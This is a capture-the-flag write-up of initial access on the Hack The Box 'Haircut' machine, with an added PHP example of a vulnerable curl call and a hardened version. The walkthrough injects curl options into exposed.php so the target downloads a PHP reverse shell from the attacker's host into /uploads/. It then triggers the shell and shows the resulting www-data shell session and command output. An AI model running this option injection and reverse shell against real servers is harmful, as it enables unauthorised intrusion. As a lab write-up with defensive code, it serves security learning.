cURL
While curl is mostly used to interact with web servers, it can do many other things, such as uploading, downloading, reading and writing files, and even assisting with privilege escalation.
In this assessment, the /exposed.php file is likely passing the supplied URL straight to the curl command in order to fetch and include other websites. That is why the image in the webroot is rendered when I enter its URL.
┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ echo 'Hello there!' > test.txt
Accessing remote resources also appears to be available.
With this confirmed, I can gain an initial foothold on the target system by the following method.
I will have the target web server download a PHP reverse shell that I host on Kali and save it under the /uploads/ directory that I enumerated earlier.
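As an added illustration (not the box's own exposed.php, whose source this page does not show), the shell-out pattern that explains the behaviour above and a hardened form of it. Function names are hypothetical; the fix is to validate the URL and fetch it through the curl extension, so there is no command line for extra options to ride in on.

```php
<?php
// Added example, not the source of the Haircut box's exposed.php (this page does not show it).

// Vulnerable pattern: the raw parameter is spliced into a shell command line, so extra
// curl options (for example "-o <path>") ride along with the URL and curl honours them.
function fetchVulnerable(string $userInput): string
{
    return (string) shell_exec('curl ' . $userInput);
}

// Hardened pattern: validate the input as an http(s) URL, then fetch it with the curl
// extension instead of a shell. There is no command line to inject options into, and the
// response is only ever returned to PHP as a string, never written to disk by curl.
function fetchHardened(string $userInput): ?string
{
    $url = filter_var($userInput, FILTER_VALIDATE_URL);
    if ($url === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,                              // body comes back as a string
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS, // no file://, gopher://, etc.
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,
        CURLOPT_CONNECTTIMEOUT  => 5,
        CURLOPT_TIMEOUT         => 10,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);

    return $body === false ? null : $body;
}

// If a shell invocation really cannot be avoided, the argument must at least be quoted and
// curl's option parsing stopped: escapeshellarg() turns the whole input into one word, and
// "--" tells curl that everything after it is a URL, not an option.
function fetchQuoted(string $userInput): string
{
    return (string) shell_exec('curl -- ' . escapeshellarg($userInput));
}
```

Of the three, fetchHardened is the one to reach for; fetchQuoted only closes the option-injection hole and still leaves a shell and unrestricted URL schemes in play.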
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ simplehttp .
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Hosting the payload over HTTP so that the target web server can fetch it
http://10.10.14.5:8000/shell.php -o ./uploads/shell.php
Sending in the cURL command to fetch and save the payload to the /uploads/ directory
The payload should now be available in the /uploads/ directory
Good
┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ curl http://$IP/uploads/shell.php
Triggering the payload
┌──(kali㉿kali)-[~/archive/htb/labs/haircut]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.24] 56288
SOCKET: Shell has connected! PID: 4012
whoami
www-data
hostname
haircut
ifconfig
ens160 Link encap:Ethernet HWaddr 00:50:56:b9:91:bf
inet addr:10.10.10.24 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb9:91bf/64 Scope:Link
inet6 addr: dead:beef::250:56ff:feb9:91bf/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:992984 errors:0 dropped:72 overruns:0 frame:0
TX packets:988145 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:187291330 (187.2 MB) TX bytes:370888154 (370.8 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:160 errors:0 dropped:0 overruns:0 frame:0
TX packets:160 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:11840 (11.8 KB) TX bytes:11840 (11.8 KB)
Initial foothold established on the target system as the www-data user by exploiting the cURL command injection